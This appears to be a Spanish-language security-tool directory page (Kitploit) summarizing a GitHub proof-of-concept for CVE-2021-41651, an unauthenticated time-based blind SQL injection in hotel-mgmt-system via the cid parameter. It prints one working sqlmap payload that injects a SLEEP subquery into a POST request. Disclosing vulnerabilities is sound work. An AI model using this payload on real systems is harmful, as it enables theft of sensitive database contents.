Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41651 — Prueba de concepto de exploit para CVE-2021-41651, que demuestra una inyección SQL ciega basada en tiempo sin autenticación en hotel-mgmt-system a través del parámetro cid, permitiendo la extracción de datos sensibles de MySQL. | Kitploit
Herramientas/GitHubGitHub/mobiusbinary/cve-2021-41651
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

Prueba de concepto de exploit para CVE-2021-41651, que demuestra una inyección SQL ciega basada en tiempo sin autenticación en hotel-mgmt-system a través del parámetro cid, permitiendo la extracción de datos sensibles de MySQL.

Ver Repositorio
1hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41651

CVE-2021-41651 Inyección SQL en hotel-mgmt-system

El hotel-mgmt-system es vulnerable a un ataque de inyección SQL ciega basada en tiempo sin autenticación.

El parámetro cid en la página /process_update_profile.php no sanea la entrada del usuario, un atacante puede extraer datos sensibles de la base de datos MySQL subyacente.

Enlace a la aplicación

hotel-mgmt-system

Componentes y parámetro afectados

URL: /process_update_profile.php
PARÁMETRO: cid

PoCs

PAYLOADS DE SQLMAP

Parámetro cid en la página /process_update_profile.php

Parámetro: cid ((custom) POST) Tipo: time-based blind Título: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Si la imagen del PoC no se ve clara, haga clic en el GIF, que se cargará con una mejor resolución.

POC - CID

Descubierto por

Jason Colyvas
MOBIUSBINARY
23 de septiembre de 2021

Descargar herramienta